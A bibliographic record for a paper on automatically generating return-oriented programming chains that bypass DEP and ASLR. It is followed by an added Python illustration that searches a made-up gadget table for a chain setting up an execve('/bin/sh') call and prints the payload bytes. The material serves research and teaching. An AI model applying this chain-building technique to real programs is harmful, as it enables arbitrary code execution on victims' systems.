TY - JOUR
T1 - ARG
T2 - Automatic ROP Chains Generation
AU - Wei, Yuan
AU - Luo, Senlin
AU - Zhuge, Jianwei
AU - Gao, Jing
AU - Zheng, Ennan
AU - Li, Bo
AU - Pan, Limin
N1 - Publisher Copyright:
© 2013 IEEE.
PY - 2019
Y1 - 2019
N2 - Return Oriented Programming (ROP) chain attacks have been widely used to bypass Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). However, ROP chains are still largely written by hand: current techniques for generating them automatically remain insufficiently researched and have few successful applications. Existing methods translate the semantics of the original instructions into an Intermediate Language (IL) for symbolic execution and then fill in a predefined gadget arrangement to construct a gadget list automatically. This approach has two problems: (1) converting the original instructions to IL adds a large amount of overhead time, and critical instructions may be discarded; (2) populating a predetermined gadget arrangement is inflexible and may fail to construct a ROP chain because of address mismatching. In this paper, we propose Automatic ROP chains Generation (ARG), the first fully automatic ROP chain generation tool that does not use an IL. Tested on data from 6 open-source international Capture The Flag (CTF) competitions and 3 Common Vulnerabilities and Exposures (CVE) entries, it successfully generated ROP chains for all of them. According to the obtained results, our technique automatically creates ROP payloads and reduces the ROP exploit payload by up to 80%. It takes only 3-5 seconds to exploit successfully, compared with at least 60 minutes of manual analysis, and it effectively bypasses both Write XOR Execute (WX) and ASLR.
AB - Return Oriented Programming (ROP) chain attacks have been widely used to bypass Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). However, ROP chains are still largely written by hand: current techniques for generating them automatically remain insufficiently researched and have few successful applications. Existing methods translate the semantics of the original instructions into an Intermediate Language (IL) for symbolic execution and then fill in a predefined gadget arrangement to construct a gadget list automatically. This approach has two problems: (1) converting the original instructions to IL adds a large amount of overhead time, and critical instructions may be discarded; (2) populating a predetermined gadget arrangement is inflexible and may fail to construct a ROP chain because of address mismatching. In this paper, we propose Automatic ROP chains Generation (ARG), the first fully automatic ROP chain generation tool that does not use an IL. Tested on data from 6 open-source international Capture The Flag (CTF) competitions and 3 Common Vulnerabilities and Exposures (CVE) entries, it successfully generated ROP chains for all of them. According to the obtained results, our technique automatically creates ROP payloads and reduces the ROP exploit payload by up to 80%. It takes only 3-5 seconds to exploit successfully, compared with at least 60 minutes of manual analysis, and it effectively bypasses both Write XOR Execute (WX) and ASLR.
KW - AMOCO
KW - Z3 solver
KW - automatic exploit generation
KW - return oriented programming
KW - satisfiability modulo theories
UR - http://www.scopus.com/inward/record.url?scp=85097336137&partnerID=8YFLogxK
U2 - 10.1109/ACCESS.2019.2937585
DO - 10.1109/ACCESS.2019.2937585
M3 - Article
AN - SCOPUS:85097336137
SN - 2169-3536
VL - 7
SP - 120152
EP - 120163
JO - IEEE Access
JF - IEEE Access
M1 - 8813052
ER -
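The abstract contrasts filling a predefined gadget arrangement (which fails when the exact gadget shape it expects is absent) with searching for any gadget sequence that reaches the needed register state. The following toy builder, added here as an illustration and not the ARG tool or its algorithm, shows that difference on a constructed x86-64 gadget table: a rigid template demanding one bare `pop REG ; ret` per register fails, while a breadth-first search over gadget effects finds a chain that sets rax/rdi/rsi/rdx for an execve syscall and lays it out as stack qwords. All addresses, the gadget semantics and the "/bin/sh" location are constructed for the example; no SMT solver is used.

```python
"""Toy automatic ROP-chain search (illustration added to this record; not the
ARG tool or its algorithm). Gadgets are modelled by their register effects and
a breadth-first search finds an ordering that reaches the register state an
x86-64 execve("/bin/sh", 0, 0) syscall needs, then lays the chain out as the
qwords an attacker would write onto the stack. All addresses are constructed."""
from collections import deque
import struct

# Constructed gadget table: address -> effects executed before the gadget's `ret`.
# ("pop", reg) consumes one stack qword into reg; ("zero", reg) sets reg to 0.
# Deliberately no bare `pop rsi ; ret` or `pop rdx ; ret`: both carry a second pop.
GADGETS = {
    0x401a3e: (("pop", "rdi"),),                 # pop rdi ; ret
    0x401b10: (("pop", "rsi"), ("pop", "r15")),  # pop rsi ; pop r15 ; ret
    0x401c22: (("pop", "rdx"), ("pop", "rbx")),  # pop rdx ; pop rbx ; ret
    0x401d05: (("zero", "rax"),),                # xor eax, eax ; ret
    0x401d3a: (("pop", "rax"),),                 # pop rax ; ret
}
SYSCALL_GADGET = 0x401e44   # syscall ; ret (terminal gadget, constructed address)
BINSH_ADDR = 0x404060       # constructed address of a "/bin/sh\0" string
JUNK = 0x4141414141414141   # filler for registers the chain does not care about
SYS_EXECVE = 59
TARGET = {"rax": SYS_EXECVE, "rdi": BINSH_ADDR, "rsi": 0, "rdx": 0}


def apply_gadget(effects, state, target):
    """Return (new_state, popped_words) after one gadget, or None when the gadget
    would overwrite a register that already holds its target value."""
    state = dict(state)
    popped = []
    for op, reg in effects:
        new_val = target.get(reg, JUNK) if op == "pop" else 0
        if reg in target and state.get(reg) == target[reg] and new_val != target[reg]:
            return None
        if op == "pop":
            popped.append(new_val)
        state[reg] = new_val
    return state, popped


def template_chain(gadgets, target):
    """Rigid 'predefined arrangement': demands one bare `pop REG ; ret` per target
    register and gives up when that exact gadget shape is absent."""
    chain = []
    for reg, val in target.items():
        exact = [a for a, eff in gadgets.items() if eff == (("pop", reg),)]
        if not exact:
            return None
        chain.append((exact[0], [val]))
    return chain


def find_chain(gadgets, target, max_len=6):
    """Breadth-first search over gadget sequences; returns [(addr, popped_words)]
    for the shortest chain that reaches `target`, or None."""
    queue = deque([({}, [])])
    seen = {frozenset()}
    while queue:
        state, chain = queue.popleft()
        if all(state.get(r) == v for r, v in target.items()):
            return chain
        if len(chain) >= max_len:
            continue
        for addr, effects in gadgets.items():
            result = apply_gadget(effects, state, target)
            if result is None:
                continue
            new_state, popped = result
            key = frozenset(new_state.items())
            if key in seen:
                continue
            seen.add(key)
            queue.append((new_state, chain + [(addr, popped)]))
    return None


def build_payload(chain, final_gadget):
    """Lay the chain out as little-endian qwords: each gadget address followed by
    the values its pops consume, ending with the terminal gadget."""
    words = []
    for addr, popped in chain:
        words.append(addr)
        words.extend(popped)
    words.append(final_gadget)
    return b"".join(struct.pack("<Q", w) for w in words)


def simulate(chain, gadgets):
    """Replay a chain against the gadget table and return the final register state."""
    state = {}
    for addr, popped in chain:
        popped = list(popped)
        for op, reg in gadgets[addr]:
            state[reg] = popped.pop(0) if op == "pop" else 0
    return state


if __name__ == "__main__":
    print("template approach:", template_chain(GADGETS, TARGET))
    chain = find_chain(GADGETS, TARGET)
    for addr, popped in chain:
        print(hex(addr), [hex(p) for p in popped])
    print(build_payload(chain, SYSCALL_GADGET).hex())
```

The template fails because the constructed binary only offers `pop rsi ; pop r15 ; ret` and `pop rdx ; pop rbx ; ret`; the search accepts them and pads the extra pops with filler, and `simulate` confirms the final register state before the payload is emitted. A real tool would additionally have to prove the gadgets are reachable at the leaked base (ASLR), avoid bad bytes in the addresses, and respect stack-size limits, none of which this toy models.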